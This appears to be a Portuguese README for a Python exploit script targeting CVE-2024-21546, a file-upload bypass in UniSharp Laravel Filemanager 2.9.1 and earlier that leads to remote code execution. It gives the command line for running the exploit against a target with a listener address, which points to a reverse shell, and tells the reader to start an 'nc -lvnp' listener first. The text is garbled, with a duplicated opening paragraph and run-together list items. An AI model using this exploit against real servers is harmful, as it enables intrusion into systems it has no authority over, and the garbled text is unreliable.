
Este script de exploit em Python tem como alvo um Laravel Filemanager vulnerável criado pela UniSharp, que permite que usuários autenticados contornem as restrições de arquivos e carreguem arquivos maliciosos. Isso pode levar à Execução Remota de Código (RCE) quando o payload carregado é acionado.
Este script de exploit Python tem como alvo um Laravel Filemanager vulnerável criado por UniSharp, que permite que usuários autenticados contornem restrições de arquivos e enviem arquivos maliciosos. Isso pode levar à Execução Remota de Código (RCE) quando o payload enviado é acionado.
O exploit realiza o seguinte:
laravel_session fornecido pelo usuário_token CSRF via regexVersão 2.9.1 e versões anteriores
python3 CVE-2024-21546.py <target_url> <listener_ip> <listener_port> <laravel_session>
Importante: inicie seu listener antes de executar o script:
nc -lvnp <listener_port>
